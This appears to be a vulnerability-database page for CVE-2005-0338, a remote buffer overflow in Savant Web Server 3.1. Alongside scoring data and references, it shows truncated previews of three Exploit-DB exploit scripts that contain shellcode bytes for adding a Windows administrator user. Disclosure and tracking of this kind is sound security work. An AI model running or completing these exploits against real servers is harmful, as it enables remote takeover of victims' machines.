CVE-2005-0338
published 2005-05-02CVE-2005-0338: Buffer overflow in Savant Web Server 3.1 allows remote attackers to execute arbitrary code via a long HTTP request.
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
5.44%
91.7th percentile
Buffer overflow in Savant Web Server 3.1 allows remote attackers to execute arbitrary code via a long HTTP request.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| savant | savant_webserver | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Savant Web Server 3.1 (French Windows)- Remote Buffer Overflow
exploitdb·2005-02-15
CVE-2005-0338 Savant Web Server 3.1 (French Windows)- Remote Buffer Overflow
Savant Web Server 3.1 (French Windows)- Remote Buffer Overflow
---
#########################################################
# #
# Savant web server Buffer Overflow Exploit #
# Discovered by : Mati Aharoni #
# Coded by : Tal Zeltzer and Mati Aharoni #
# www.see-security.com #
# FOR RESEACRH PURPOSES ONLY! #
# FRench Win OS support by Jerome Athias #
#########################################################
import struct
import socket
sc = "\x90" * 21 #We need this number of nops
# win32_adduser - PASS=pwd EXITFUNC=thread USER=X Size=232 Encoder=PexFnstenvSub http://metasploit.com
sc += "\x31\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"
sc += "\x23\x73\xe4\x83\xeb\xfc\xe2\xf4\x24\xcb\x35\xe4\xd8\x23\xf8\xa1"
sc += "\xe4\xa8\x0f\xe1\xa0\x22\x9c\x6f\x97\x3b\xf8\xbb\xf8\x22\x
Exploit-DB
Savant Web Server 3.1 (Windows 2003) - Remote Buffer Overflow
exploitdb·2005-02-04
CVE-2005-0338 Savant Web Server 3.1 (Windows 2003) - Remote Buffer Overflow
Savant Web Server 3.1 (Windows 2003) - Remote Buffer Overflow
---
#!/usr/bin/perl
#
#D:\Documents and Settings\Administrator\Desktop\explo da uppare\prova>savant.pl
#-h 127.0.0.1
#
#-=[ Savant Web Server 3.1 Remote Buffer Overflow Exploit ]=-
#-=[ ]=-
#-=[ Coded by CorryL info:www.x0n3-h4ck.org ]=-
#
#[+] Connect to 127.0.0.1
#[+] Using 00b7ead8 // Ret For Win2003
#[+] Sending Payload 258 byte
#[+] Creating Administrator User: User 'bug' Password 'hack'
#
#D:\Documents and Settings\Administrator\Desktop\explo da uppare\prova>net users
#
#Account utente per \\SERVER
# Added above info from http://x0n3-h4ck.org /str0ke #
##################################################################################
#Savant Web Server 3.1 Remote Buffer Overflow Exploit #
# #
#This is exploit sending the
Exploit-DB
Savant Web Server 3.1 - Remote Buffer Overflow (1)
exploitdb·2005-02-01
CVE-2005-0338 Savant Web Server 3.1 - Remote Buffer Overflow (1)
Savant Web Server 3.1 - Remote Buffer Overflow (1)
---
#########################################################
# #
# Savant web server Buffer Overflow Exploit #
# Discovered by : Mati Aharoni #
# Coded by : Tal Zeltzer and Mati Aharoni #
# www.see-security.com #
# FOR RESEACRH PURPOSES ONLY! #
#########################################################
import struct
import socket
sc = "\x90" * 21
# win32_adduser - PASS=pwd EXITFUNC=thread USER=X Size=232 Encoder=PexFnstenvSub http://metasploit.com
sc += "\x31\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"
sc += "\x23\x73\xe4\x83\xeb\xfc\xe2\xf4\x24\xcb\x35\xe4\xd8\x23\xf8\xa1"
sc += "\xe4\xa8\x0f\xe1\xa0\x22\x9c\x6f\x97\x3b\xf8\xbb\xf8\x22\x98\x07"
sc += "\xf6\x6a\xf8\xd0\x53\x22\x9d\xd5\x18\xba\xdf\x60\x18\x57\x74\x25"
sc
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=110756234611259&w=2http://marc.info/?l=full-disclosure&m=110725682327452&w=2http://marc.info/?l=full-disclosure&m=110728448025559&w=2http://www.securityfocus.com/bid/12429https://exchange.xforce.ibmcloud.com/vulnerabilities/19177http://marc.info/?l=bugtraq&m=110756234611259&w=2http://marc.info/?l=full-disclosure&m=110725682327452&w=2http://marc.info/?l=full-disclosure&m=110728448025559&w=2http://www.securityfocus.com/bid/12429https://exchange.xforce.ibmcloud.com/vulnerabilities/19177
2005-05-02
Published